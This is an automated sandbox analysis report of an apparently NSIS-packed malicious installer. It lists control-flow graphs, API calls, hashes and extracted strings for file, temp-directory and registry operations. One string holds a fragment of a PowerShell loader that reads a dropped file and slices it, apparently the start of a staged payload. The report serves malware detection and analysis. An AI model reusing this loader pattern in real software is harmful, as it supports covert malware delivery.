                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                          • String ID: "$Fuffy=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Thalamiflorous.Tus209';$Antigenes=$Fuffy.SubString(5$: Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                          • API String ID: 717251189-1909516590
                                                                                                                          • Opcode ID: e482eba231f8f4520b3a73f5e1a7f8ad6871b3a875979b684132498817419dc4
                                                                                                                          • Instruction ID: e6e4ebc4b258379f565b747a0f7be2a01952c0151b7e77293941e8e44b6b8026
                                                                                                                          • Opcode Fuzzy Hash: e482eba231f8f4520b3a73f5e1a7f8ad6871b3a875979b684132498817419dc4
                                                                                                                          • Instruction Fuzzy Hash: 12611171A00215ABDF209F64CC40AAE37A5AF54314F22813FE947BB2D0D77D5AA2CB5D

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 499 40176f-401794 call 402c41 call 405bd0 504 401796-40179c call 406284 499->504 505 40179e-4017b0 call 406284 call 405b59 lstrcatW 499->505 511 4017b5-4017b6 call 406518 504->511 505->511 514 4017bb-4017bf 511->514 515 4017c1-4017cb call 4065c7 514->515 516 4017f2-4017f5 514->516 524 4017dd-4017ef 515->524 525 4017cd-4017db CompareFileTime 515->525 518 4017f7-4017f8 call 405d55 516->518 519 4017fd-401819 call 405d7a 516->519 518->519 526 40181b-40181e 519->526 527 40188d-4018b6 call 4052ec call 403116 519->527 524->516 525->524 528 401820-40185e call 406284 * 2 call 4062a6 call 406284 call 4058ea 526->528 529 40186f-401879 call 4052ec 526->529 541 4018b8-4018bc 527->541 542 4018be-4018ca SetFileTime 527->542 528->514 562 401864-401865 528->562 539 401882-401888 529->539 543 402ace 539->543 541->542 545 4018d0-4018db CloseHandle 541->545 542->545 549 402ad0-402ad4 543->549 547 4018e1-4018e4 545->547 548 402ac5-402ac8 545->548 551 4018e6-4018f7 call 4062a6 lstrcatW 547->551 552 4018f9-4018fc call 4062a6 547->552 548->543 557 401901-4022fc call 4058ea 551->557 552->557 557->548 557->549 562->539 564 401867-401868 562->564 564->529
                                                                                                                          APIs
                                                                                                                          • lstrcatW.KERNEL32(00000000,00000000,Polystichoid,C:\Users\user\AppData\Local\Temp\depersonaliseredes,?,?,00000031), ref: 004017B0
                                                                                                                          • CompareFileTime.KERNEL32(-00000014,?,Polystichoid,Polystichoid,00000000,00000000,Polystichoid,C:\Users\user\AppData\Local\Temp\depersonaliseredes,?,?,00000031), ref: 004017D5
                                                                                                                            • Part of subcall function 00406284: lstrcpynW.KERNEL32(?,?,00000400,0040342A,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406291
                                                                                                                            • Part of subcall function 004052EC: lstrlenW.KERNEL32(Completed,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
                                                                                                                            • Part of subcall function 004052EC: lstrlenW.KERNEL32(0040324F,Completed,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
                                                                                                                            • Part of subcall function 004052EC: lstrcatW.KERNEL32(Completed,0040324F,0040324F,Completed,00000000,00410EA0,004030B0), ref: 00405347
                                                                                                                            • Part of subcall function 004052EC: SetWindowTextW.USER32(Completed,Completed), ref: 00405359
                                                                                                                            • Part of subcall function 004052EC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
                                                                                                                            • Part of subcall function 004052EC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
                                                                                                                            • Part of subcall function 004052EC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\depersonaliseredes$C:\Users\user\AppData\Local\Temp\slgtsbog\oblating.ini$Polystichoid$nerveklinikkernes
                                                                                                                          • API String ID: 1941528284-1520701577
                                                                                                                          • Opcode ID: f8428ececabf4161325116f3acae4040179a1912e67cedcda78f44ceba6070dd
                                                                                                                          • Instruction ID: 128eea75dfaaf3eda36781b62dd3037428c7b97943fe82b2985fb16c69cf4114
                                                                                                                          • Opcode Fuzzy Hash: f8428ececabf4161325116f3acae4040179a1912e67cedcda78f44ceba6070dd
                                                                                                                          • Instruction Fuzzy Hash: C541A031900519BFCF10BBA5CD46EAE3679EF45328B20427FF412B10E1CA3C8A519A6E

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 565 4052ec-405301 566 405307-405318 565->566 567 4053b8-4053bc 565->567 568 405323-40532f lstrlenW 566->568 569 40531a-40531e call 4062a6 566->569 571 405331-405341 lstrlenW 568->571 572 40534c-405350 568->572 569->568 571->567 573 405343-405347 lstrcatW 571->573 574 405352-405359 SetWindowTextW 572->574 575 40535f-405363 572->575 573->572 574->575 576 405365-4053a7 SendMessageW * 3 575->576 577 4053a9-4053ab 575->577 576->577 577->567 578 4053ad-4053b0 577->578 578->567
                                                                                                                          APIs
                                                                                                                          • lstrlenW.KERNEL32(Completed,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
                                                                                                                          • lstrlenW.KERNEL32(0040324F,Completed,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
                                                                                                                          • lstrcatW.KERNEL32(Completed,0040324F,0040324F,Completed,00000000,00410EA0,004030B0), ref: 00405347
                                                                                                                          • SetWindowTextW.USER32(Completed,Completed), ref: 00405359
                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
                                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
                                                                                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                          • String ID: Completed
                                                                                                                          • API String ID: 2531174081-3087654605
                                                                                                                          • Opcode ID: 4b00a31e1e5ea89d2dd6f616c58afdbca4195894880e32749fa2d66186394066
                                                                                                                          • Instruction ID: 5cbdc996bc9841dedcc8c590482a37e7ed43af3164ff52369f5afd8429117419
                                                                                                                          • Opcode Fuzzy Hash: 4b00a31e1e5ea89d2dd6f616c58afdbca4195894880e32749fa2d66186394066
                                                                                                                          • Instruction Fuzzy Hash: FA219D71900618BBDB11AF96DD849CFBF78EF45354F50807AF904B62A0C3B94A50CFA8

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 579 4065ee-40660e GetSystemDirectoryW 580 406610 579->580 581 406612-406614 579->581 580->581 582 406625-406627 581->582 583 406616-40661f 581->583 585 406628-40665b wsprintfW LoadLibraryExW 582->585 583->582 584 406621-406623 583->584 584->585
                                                                                                                          APIs
                                                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406605
                                                                                                                          • wsprintfW.USER32 ref: 00406640
                                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406654
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                          • String ID: %s%S.dll$UXTHEME$\
                                                                                                                          • API String ID: 2200240437-1946221925
                                                                                                                          • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                                                          • Instruction ID: 0a3accc906e0554885a7c349f3439cc1632e9825758041c21a8046ddc9b1cf8d
                                                                                                                          • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                                                          • Instruction Fuzzy Hash: 28F0217050111967CB10EB64DD0DFAB3B6CA700304F10487AA547F10D1EBBDDB64CB98

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 586 403116-40312d 587 403136-40313e 586->587 588 40312f 586->588 589 403140 587->589 590 403145-40314a 587->590 588->587 589->590 591 40315a-403167 call 4032fb 590->591 592 40314c-403155 call 403311 590->592 596 4032b2 591->596 597 40316d-403171 591->597 592->591 600 4032b4-4032b5 596->600 598 403177-403197 GetTickCount call 4067bf 597->598 599 40329b-40329d 597->599 610 4032f1 598->610 612 40319d-4031a5 598->612 601 4032e6-4032ea 599->601 602 40329f-4032a2 599->602 604 4032f4-4032f8 600->604 605 4032b7-4032bd 601->605 606 4032ec 601->606 607 4032a4 602->607 608 4032a7-4032b0 call 4032fb 602->608 613 4032c2-4032d0 call 4032fb 605->613 614 4032bf 605->614 606->610 607->608 608->596 619 4032ee 608->619 610->604 616 4031a7 612->616 617 4031aa-4031b8 call 4032fb 612->617 613->596 623 4032d2-4032de call 405e2c 613->623 614->613 616->617 617->596 624 4031be-4031c7 617->624 619->610 629 4032e0-4032e3 623->629 630 403297-403299 623->630 626 4031cd-4031ea call 4067df 624->626 632 4031f0-403207 GetTickCount 626->632 633 403293-403295 626->633 629->601 630->600 634 403252-403254 632->634 635 403209-403211 632->635 633->600 636 403256-40325a 634->636 637 403287-40328b 634->637 638 403213-403217 635->638 639 403219-40324a MulDiv wsprintfW call 4052ec 635->639 641 40325c-403261 call 405e2c 636->641 642 40326f-403275 636->642 637->612 643 403291 637->643 638->634 638->639 644 40324f 639->644 647 403266-403268 641->647 646 40327b-40327f 642->646 643->610 644->634 646->626 648 403285 646->648 647->630 649 40326a-40326d 647->649 648->610 649->646
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CountTick$wsprintf
                                                                                                                          • String ID: ... %d%%
                                                                                                                          • API String ID: 551687249-2449383134
                                                                                                                          • Opcode ID: 557a710098fc5fea4fad4b99a5744db3c4a6bc79f6805394010e30fec0e2fa40
                                                                                                                          • Instruction ID: eb9965c025c0ad248c1811abffb3300191da1be904cace2ded6344ef59bce26d
                                                                                                                          • Opcode Fuzzy Hash: 557a710098fc5fea4fad4b99a5744db3c4a6bc79f6805394010e30fec0e2fa40
                                                                                                                          • Instruction Fuzzy Hash: 97516B71900219EBCB10DF65EA44A9F3BA8AF44766F1441BFFC04B72C1C7789E518BA9

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 650 405da9-405db5 651 405db6-405dea GetTickCount GetTempFileNameW 650->651 652 405df9-405dfb 651->652 653 405dec-405dee 651->653 655 405df3-405df6 652->655 653->651 654 405df0 653->654 654->655
                                                                                                                          APIs
                                                                                                                          • GetTickCount.KERNEL32 ref: 00405DC7
                                                                                                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\TjoY7n65om.exe",00403357,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,774D3420,004035A3), ref: 00405DE2
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CountFileNameTempTick
                                                                                                                          • String ID: "C:\Users\user\Desktop\TjoY7n65om.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                          • API String ID: 1716503409-2132468474
                                                                                                                          • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                                                          • Instruction ID: 8d675393d4be3a1a13ee7cec111603dd999094634a9ab4ae6aafa5463bef85a0
                                                                                                                          • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                                                          • Instruction Fuzzy Hash: 9BF03076A00304FBEB00DF69DD09E9BB7A9EF95710F11803BE900E7250E6B09954DB64

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 656 4023e4-402415 call 402c41 * 2 call 402cd1 663 402ac5-402ad4 656->663 664 40241b-402425 656->664 665 402427-402434 call 402c41 lstrlenW 664->665 666 402438-40243b 664->666 665->666 669 40243d-40244e call 402c1f 666->669 670 40244f-402452 666->670 669->670 674 402463-402477 RegSetValueExW 670->674 675 402454-40245e call 403116 670->675 678 402479 674->678 679 40247c-40255d RegCloseKey 674->679 675->674 678->679 679->663
                                                                                                                          APIs
                                                                                                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\slgtsbog\oblating.ini,00000023,00000011,00000002), ref: 0040242F
                                                                                                                          • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\slgtsbog\oblating.ini,00000000,00000011,00000002), ref: 0040246F
                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\slgtsbog\oblating.ini,00000000,00000011,00000002), ref: 00402557
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseValuelstrlen
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\slgtsbog\oblating.ini
                                                                                                                          • API String ID: 2655323295-1497819284
                                                                                                                          • Opcode ID: 58e8d34890d429fdc95bed5fa579bd7a10b097d43d2a2625128ce20b791e1a8c
                                                                                                                          • Instruction ID: a134a75014e9aaf936f4ed277425746fec7608ee04f1c2dd62efd2514dae3daa
                                                                                                                          • Opcode Fuzzy Hash: 58e8d34890d429fdc95bed5fa579bd7a10b097d43d2a2625128ce20b791e1a8c
                                                                                                                          • Instruction Fuzzy Hash: 15118471D00104BEEB10AFA5DE89EAEBA74EB44754F11803BF504B71D1D7B88D419B68

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 681 402d44-402d6d call 4060f1 683 402d72-402d74 681->683 684 402d76-402d7c 683->684 685 402dec-402df0 683->685 686 402d98-402dad RegEnumKeyW 684->686 687 402d7e-402d80 686->687 688 402daf-402dc1 RegCloseKey call 40665e 686->688 689 402dd0-402dde RegCloseKey 687->689 690 402d82-402d96 call 402d44 687->690 695 402de0-402de6 RegDeleteKeyW 688->695 696 402dc3-402dce 688->696 689->685 690->686 690->688 695->685 696->685
                                                                                                                          APIs
                                                                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Close$Enum
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 464197530-0
                                                                                                                          • Opcode ID: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
                                                                                                                          • Instruction ID: 673fb129a4d8ab743942914098bbacbd975ea3c1b6875aa08396d434171036d0
                                                                                                                          • Opcode Fuzzy Hash: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
                                                                                                                          • Instruction Fuzzy Hash: C7116A32500108FBDF02AB90CE09FEE7B7DAF54340F100076B905B51E0EBB59E21AB58

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 782 4015c1-4015d5 call 402c41 call 405c04 787 401631-401634 782->787 788 4015d7-4015ea call 405b86 782->788 790 401663-402250 call 401423 787->790 791 401636-401655 call 401423 call 406284 SetCurrentDirectoryW 787->791 796 401604-401607 call 405838 788->796 797 4015ec-4015ef 788->797 803 402ac5-402ad4 790->803 804 40288b-402892 790->804 791->803 809 40165b-40165e 791->809 807 40160c-40160e 796->807 797->796 800 4015f1-4015f8 call 405855 797->800 800->796 815 4015fa-401602 call 4057bb 800->815 804->803 811 401610-401615 807->811 812 401627-40162f 807->812 809->803 813 401624 811->813 814 401617-401622 GetFileAttributesW 811->814 812->787 812->788 813->812 814->812 814->813 815->807
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00405C04: CharNextW.USER32(?,?,00425EF0,?,00405C78,00425EF0,00425EF0,?,?,774D3420,004059B6,?,C:\Users\user\AppData\Local\Temp\,774D3420,00000000), ref: 00405C12
                                                                                                                            • Part of subcall function 00405C04: CharNextW.USER32(00000000), ref: 00405C17
                                                                                                                            • Part of subcall function 00405C04: CharNextW.USER32(00000000), ref: 00405C2F
                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                            • Part of subcall function 004057BB: CreateDirectoryW.KERNEL32(?,?,00000000), ref: 004057FE
                                                                                                                          • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\depersonaliseredes,?,00000000,000000F0), ref: 0040164D
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Local\Temp\depersonaliseredes, xrefs: 00401640
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\depersonaliseredes
                                                                                                                          • API String ID: 1892508949-2693056274
                                                                                                                          • Opcode ID: ddfeeda49915d85a532ba335a3f5d96bf8af22eec7216368a20200d1754f1dc9
                                                                                                                          • Instruction ID: cdbb32f604e1e97b4505581c5a6dce2e2be8be56f1f537164db10111f90f244e
                                                                                                                          • Opcode Fuzzy Hash: ddfeeda49915d85a532ba335a3f5d96bf8af22eec7216368a20200d1754f1dc9
                                                                                                                          • Instruction Fuzzy Hash: 5911D031504501EBCF30BFA4CD4199F36A0EF14329B29493BFA45B22F1DB3E49519A5E
                                                                                                                          APIs
                                                                                                                          • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,: Completed,?,?,004063C6,80000002), ref: 00406198
